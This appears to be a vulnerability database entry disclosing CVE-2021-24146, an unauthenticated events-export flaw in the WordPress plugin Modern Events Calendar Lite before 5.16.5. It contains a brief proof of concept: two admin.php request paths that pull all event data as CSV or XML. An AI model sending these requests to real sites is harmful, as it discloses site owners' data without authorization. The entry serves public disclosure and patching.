Lucene search
KhanhWPVDB-ID:C7B1EBD6-3050-4725-9C87-0EA525F8FECCHistoryJan 29, 2021 - 12:00 a.m.
Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
2021-01-2900:00:00
khanh
wpscan.com
12
0.026 Low
EPSS
Percentile
90.4%
The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.
PoC
https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing /wp-admin/admin.php?page=MEC-ix&tab;=MEC-export&mec-ix-action;=export-events&format;=csv /wp-admin/admin.php?page=MEC-ix&tab;=MEC-export&mec-ix-action;=export-events&format;=xml
| CPE | Name | Operator | Version |
|---|---|---|---|
| modern-events-calendar-lite | lt | 5.16.5 |
Related
packetstorm
packetstorm
WordPress Modern Events Calendar 5.16.2 Information Disclosure
2021-07-02 00:00:00
zdt
zdt
nuclei
nuclei
cvelist
cvelist
prion
prion
Format string
2021-03-18 15:15:00
osv
osv
CVE-2021-24146
2021-03-18 15:15:15
wpexploit
wpexploit
Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
2021-01-29 00:00:00
cve
cve
CVE-2021-24146
2021-03-18 15:15:15
nvd
nvd
CVE-2021-24146
2021-03-18 15:15:15
exploitdb
exploitdb